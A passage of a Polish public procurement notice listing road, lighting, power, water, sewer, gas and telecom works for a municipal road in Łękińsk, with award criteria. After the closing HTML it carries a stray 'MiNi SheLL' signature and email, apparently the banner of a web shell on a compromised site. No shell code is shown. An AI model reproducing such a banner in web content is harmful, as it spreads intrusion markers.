(latarnia z ul. Przemysłowej) należy przekazać do utylizacji i przedstawić dokument potwierdzający utylizację. 7.	Zdemontowaną oprawę oświetleniową z ul. Przemysłowej należy przewiesić we wskazane miejsce przez Zamawiającego na terenie gminy. Oprawa po ściągnięciu powinna zostać poddana czyszczeniu i konserwacji. III.	Branża wod-kanIII.1. WodociągPrzedmiot zamówienia obejmuje:o	budowę odcinka sieci wodociągowej z rur PE 100, SDR11, ?160	- L = 67,5 mbo	budowę przyłączy wodociągowych z rur PE 100, SDR11, ?40	- L = 785,5 mb (43szt.)III.2. Kanalizacja sanitarnaPrzedmiot zamówienia obejmuje: o	budowę kanalizacji sanitarnej z rur PVC, SN8 lita, SDR34, ?200 - L = 881,0mbo	budowę przyłączy z rur PVC, SN8 lita, SDR34,?160 - L = 862,0mb (35szt.)o	studnie z kręgów żelbetowych ?1000 z włazami żeliwnymi wentylowanymi z wypełnieniem betonowym typu ciężkiego D400 kN - 61 kpl.III.3. Kanalizacja deszczowaPrzedmiot zamówienia obejmuje:o	budowę kanalizacji deszczowej z rur PVC, SN8 lita, SDR34, ?200 - L = 994,9mbo	studnia z kręgów żelbetowych ?1000 z włazem żeliwnym wentylowanym z wypełnieniem betonowym typu ciężkiego D400 kN - 1 kpl.o	studnie z kręgów żelbetowych ?1200 z włazami żeliwnymi wentylowanymi z wypełnieniem betonowym typu ciężkiego D400 kN - 5 kpl.o	studnie z kręgów żelbetowych ?1500 z włazami żeliwnymi wentylowanymi z wypełnieniem betonowym typu ciężkiego D400 kN - 2 kpl.o	Wpust deszczowy (uliczny) z kręgów betonowych z osadnikiem i rusztem żeliwnym klasy C250 ?500 - 66 kpl.IV. Branża gazowa Przedmiot zamówienia obejmuje w szczególności:o	budowa gazociągu średniego ciśnienia DN110 - ok. 735 m,o	budowa przyłącza gazowego DN25 - 1 szt.V. Branża telekomunikacyjnaPrzedmiot zamówienia obejmuje w szczególności:o	budowę kanalizacji dwuotworowej z rur HDPE 110/6,3 - 300,5 mo	budowę kanalizacji jednootworowej z rur HDPE 110/6,3 - 125,5 mo	likwidacja studni kablowych - 5 szt.o	budowa przyłączy abonenckich (rurociąg z rur HDPE 32/2,9) - 53 szt.o	przebudowa kabla optotelekomunikacyjnego OTK 4J na kabel Z-XOTKtd 6J, wraz z budową kanalizacji wtórnej - 1,3km<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45233140-2, 45233290-8, 45231300-8, 45232400-6, 45232100-3, 45316110-9, 45231220-3, 45231400-9, 45232221-7, 45314000-1, 45232000-2, 45230000-8, 34922100-7<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 18<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">wydłużenie okresu gwarancji i rękojmi </td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie kadry kierującej robotami budowlanymi</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">skrócenie terminu realizacji umowy </td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Część 2: ,,Budowa drogi gminnej na odcinku od ul. Ustronnej do ul. Północnej w Łękińsku wraz z infrastrukturą techniczną o dł. drogi ok. 650 mb"</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>I.	Branża drogowa - w szczególności: a.	roboty przygotowawcze, roboty rozbiórkowe, roboty ziemne, niwelacja terenu, nasypy,b.	budowa jezdni o nawierzchni SMA,c.	budowa chodników o nawierzchni z kostki betonowej w kolorze szarym gr. 8cm, o kształcie - min. trzech szerokościach i jednej wysokości, uwaga: Zamawiający nie wklucza dopuszczenia (zmiany) innego kształtu i koloru kostki (nieprzemysłowej) co zostanie ustalone na etapie realizacji. Na etapie realizacji Wykonawca ma obowiązek przedstawić co najmniej trzy rodzaje w zakresie kształtu) kostki do wyboru Zamawiającemu.d.	budowa ścieżki rowerowej, ciągów pieszo-rowerowych o nawierzchni z kostki betonowej bezfazowej gr. 8cm w kolorze czerwonym barwionej w masie (o intensywnej barwie), Uwaga - ciąg ścieżki rowerowej i ciągu pieszo-rowerowego na skrzyżowaniu ze zjazdem winien być zachowany. Na etapie realizacji Wykonawca ma obowiązek przedstawić co najmniej trzy rodzaje kostki do wyboru Zamawiającemu.e.	budowa nowych zjazdów publicznych (skrzyżowania z drogami przewidzianymi w MPZP) o nawierzchni i konstrukcji tak jak jezdnia.f.	budowa nowych zjazdów indywidualnych z kostki betonowej fazowej gr. 8cm w kolorze grafitowym barwionej w masie (o intensywnej barwie) o kształcie - min. trzech szerokościach i jednej wysokości. Uwaga: Zamawiający nie wklucza dopuszczenia (zmiany) innego kształtu kostki (nieprzemysłowej) co zostanie ustalone na etapie realizacji. Na etapie realizacji Wykonawca ma obowiązek przedstawić co najmniej trzy rodzaje w zakresie koloru i co najmniej trzy w zakresie kształtu) kostki do wyboru Zamawiającemu. Zjazdy dostosować do zagospodarowania terenu przyległego (umożliwienie dogodnego zjazdu na nieruchomości).g.	wbudowanie krawężników 15x30 kamiennych na ławie z oporem (poza krawężnikami na zakończeniach zjazdów), stosować krawężniki łukowe na łukach, krawężniki przyjezdniowe winny mieć ściętą ostrą krawędzią od strony jezdni, na skosach przy zjazdach stosować krawężniki cięte fabrycznie, na zjazdach stosować krawężniki najazdowe, stosować krawężniki o usystematyzowanej długości 1mb, nie dopuszcza się stosowania na łukach krawężników prostych, h.	wbudowanie obrzeży betonowych 8x30,i.	przebudowa skrzyżowań z ul. Północną i ul. Ustronną,j.	wprowadzenie stałej organizacji ruchu: znaki pionowe - wielkość średnia, folia II generacji, oznakowanie poziome grubowarstwowe, strukturalne,k.	zieleń (humusowanie , obsianie trawą pozostałego pasa drogowego), roboty wykończeniowe, II.	Branża elektrycznaII.1. Budowa oświetlenia ulicznegoa.	Budowa linii kablowych oświetlenia ulicznego wzdłuż drogi o długości około 817m/968m (trasa/kabel) - linia kablowa typu YAKXS 4x50mm2 + FeZn 25x4mm, oprawy LED z autonomicznym układem redukcji mocy 20 szt., podwieszone na słupach aluminiowych anodowanych okrągłych z wysięgnikami 20 kpl.b.	Budowa szafki sterowniczej oświetlenia ulicznego 1 kpl. c.	Przed zamówieniem materiałów należy uzgodnić z Zamawiającym kolorystykę, sylwetki latarń oświetleniowych (słupy, wysięgniki) i szczegóły wykonania, aby zachować podobny jednolity standard i wygląd budowanego oświetlenia na danym odcinku drogi. Sporządzić i przedstawić do zatwierdzenia przez Zamawiającego i Inspektora nadzoru rysunki wymiarowe kompletnych latarń oświetleniowych (rysunki poglądowe) oraz obliczenia doboru zaproponowanych opraw oświetleniowych. Temperatura barwowa źródeł światła nie większa niż 3000 K. Przed rozpoczęciem robót uzgodnić z Zamawiającym i Inspektorem nadzoru jednolitą i spójną numerację i oznaczenia latarń oświetleniowych. d.	Redukcję mocy dla wszystkich opraw LED instalowanych w ramach przedmiotowej inwestycji należy zrealizować następująco:- od momentu włączenia opraw do 23:00 - 100%- od 23:00 do 5:00 - 70%- od 5:00 do wyłączenia opraw nad ranem - 100%. II.2. Budowa sieci elektroenergetycznej a.	Budowa przy drodze kompletnej stacji transformatorowej kontenerowej w obudowie żelbetowej 15/0,4 kV nr STLE-5, z transformatorem suchym w izolacji żywicznej o mocy 250kVA, wraz z dojazdem i zagospodarowaniem terenu wokół stacji.b.	Budowa linii kablowych 15kV dla zasilania stacji STLE-5 - typu 3 x XRUHAKXS 1x240/50mm2 12/20kV o łącznej długości około 644m/704m (trasa/kabel).c.	Budowa linii kablowych 0,4kV ze stacji STLE-5 - typu YAKXS 4x240mm2 + FeZn 30x4mm o łącznej długości około 747m/859m (trasa/kabel) i typu YAKXS 4x35mm2 + FeZn 30x4mm o łącznej długości około 65m/78m (trasa/kabel), wraz ze złączami kablowo-pomiarowymi o numerach ZKP5.1.1, ZKP5.1.3, ZKP5.1.3.1, ZKP5.1.4, ZKP5.1.4.1, ZK6, ZKP5.2.2, ZKP5.2.4. Pozostałych złączy należy nie wykonywać.d.	Budowa wzdłuż linii 15kV rurociągu kablowego światłowodowego dwuotworowego z rur HDPE 40/3,7 wraz z kablem światłowodowym, dla potrzeb zdalnego odczytu danych z liczników (Smart Meteringu) oraz systemu sterowania i nadzoru stacji. e.	Budowa wzdłuż linii 0,4kV rurociągu kablowego światłowodowego dwuotworowego z rur HDPE 40/3,7 wraz z kablem światłowodowym, dla potrzeb zdalnego odczytu danych z liczników (Smart Meteringu).f.	Montaż liczników oraz wykonanie systemu Smart Meteringu dla liczników energii elektrycznej zainstalowanych w wybudowanej sieci. g.	Opracowanie instrukcji eksploatacji dla sieci elektroenergetycznej rozbudowanej w ramach niniejszego zadania (linie SN, nn i stacja transformatorowa).Ważne - w ofercie uwzględnić dodatkowo: 1.	Wzdłuż linii elektroenergetycznych kablowych 0,4kV ułożyć bednarkę o jednakowym przekroju FeZn 30x4mm tj. wzdłuż linii typu YAKXS 4x35mm2 należy ułożyć taśmę stalową ocynkowaną FeZn 30x4mm zamiast FeZn 25x4mm. 2.	Należy nie wykonywać wszystkich złączy kablowo-pomiarowych. Należy wybudować złącza o numerach ZKP5.1.1, ZKP5.1.3, ZKP5.1.3.1, ZKP5.1.4, ZKP5.1.4.1, ZK6, ZKP5.2.2, ZKP5.2.4. Pozostałych złączy oraz kabli zasilających złącza na odgałęzieniach przez drogę typu YAKXS 4x35mm2 + FeZn 30x4mm należy nie wykonywać. Wszystkie przepusty dla kabli należy wykonać zgodnie z projektem.3.	W przypadkach, kiedy będą wykonywane wykopy pod infrastrukturę elektroenergetyczną w bezpośrednim sąsiedztwie istniejących chodników i ścieżek rowerowych w razie ich uszkodzenia należy je odtworzyć wraz z warstwami konstrukcyjnymi. II.3. Rozwiązanie kolizji w związku z budową drogi: 1. Przebudowa istniejącej linii napowietrznej nn kolidującej z zaprojektowanym układem drogowym - przebudowa stanowiska słupowego 1 szt. 2. Przebudowa przyłączy elektrycznych nn.Ważne - w ofercie uwzględnić dodatkowo:Do przebudowy linii napowietrznej należy wykorzystać słup typu E 10,5/10 1 szt. znajdujący się w gminnym magazynie, a pochodzący z demontażu rozebranych wcześniej linii oświetleniowych. Materiały pochodzące z demontażu - elementy metalowe należy zezłomować, natomiast pozostałe materiały zutylizować. III.	Branża wod-kanIII.1. WodociągPrzedmiot zamówienia obejmuje:o	budowę odcinka sieci wodociągowej z rur PE 100, SDR11, ?110 - L = 765,0 mbo	budowę przyłączy wodociągowych z rur PE 100, SDR11, ?40 - L = 285,5 mb (35szt.)o	montaż hydrantów p.poż. nadziemnych ?80 - 6 szt.III.2. Kanalizacja sanitarnaPrzedmiot zamówienia obejmuje: o	budowę kanalizacji sanitarnej z rur PVC, SN8 lita, SDR34, ?200 - L = 667,9mbo	budowę przyłączy z rur PVC, SN8 lita, SDR34,?160 - L = 351,6mb (34szt.)o	studnie z kręgów żelbetowych ?1000 z włazami żeliwnymi wentylowanymi z wypełnieniem betonowym typu ciężkiego D400 kN - 51 kpl.III.3. Kanalizacja deszczowaPrzedmiot zamówienia obejmuje:o	budowę kanalizacji deszczowej z rur PVC, SN8 lita, SDR34, ?500 - L = 438,9mbo	budowę kanalizacji deszczowej z rur PVC, SN8 lita, SDR34, ?400 - L = 296,3mbo	budowę kanalizacji deszczowej z rur PVC, SN8 lita, SDR34, ?200 - L = 357,8mbo	studnie z kręgów żelbetowych ?1200 z włazami żeliwnymi wentylowanymi z wypełnieniem betonowym typu ciężkiego D400 kN - 15 kpl.o	Wpust deszczowy (uliczny) z kręgów betonowych z osadnikiem i rusztem żeliwnym o	klasy C250 ?500 - 35 kpl. IV. Branża gazowa o	budowa gazociągu PE 100 DN 90 SDR17,6 - 656 mo	budowa gazociągu PE 100 DN 63 SDR11 - 109 mo	budowa przyłączy gazowych PE 25 SDR 11 PE 100 RC - 34 szt.Ważne:w ofercie uwzględnić dodatkowo przekazanie przez wykonawcę przed zakończeniem robót operatorowi systemu gazowego (PSG sp. z o.o. RDG Piotrków Trybunalski) 34 szt. (dla każdego wykonanego przyłącza gazowego) reduktorów do redukcji średniego ciśnienia gazu ziemnego w przyłączach domowych o rozstawie króćców 133 x 63 mm, układ kątowy lub inny uzgodniony z operatorem, o przepływie nominalnym 10 m3/h.V. Branża telekomunikacyjnaPrzedmiot zamówienia obejmuje w szczególności:o	budowa kanalizacji kablowej 2-otworowej z rur HDPE 110 - 773 mo	budowa przyłączy abonenckich (rurociąg HDPE 32) - 34 szt.o	montaż mikrokabla optotelekomunikacyjnego 36J - 900 mo	montaż szaf kablowych dystrybucyjnych - 3 szt.o	budowa wiązki mikrokanalizacji 4x12/8 - 735 m o	budowa wiązki mikrokanalizacji 14x7/4 - 735 mSzczegółowy opis przedmiotu zamówienia określa dokumentacja projektowa opracowana przez zespół projektantów stanowiąca załącznik do niniejszego wniosku oraz wymagania szczególne załączone w SIWZ i umowie przez Zamawiającego. Przedmiary załączone do dokumentacji projektowej są wyłącznie materiałem pomocniczym. Prace budowlane należy wykonać w oparciu o dokumentację projektową:<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45233140-2, 34922100-7, 45233290-8, 45231300-8, 45232400-6, 45232100-3, 45316110-9, 45231220-3, 45231400-9, 45232221-7, 45314000-1, 45232000-2, 45230000-8<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 14<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">wydłużenie okresu gwarancji i rękojmi </td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">doświadczenie kadry kierującej robotami budowlanymi</td><td style="border: 1px solid black;border-collapse: collapse;">20,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">skrócenie terminu realizacji umowy</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com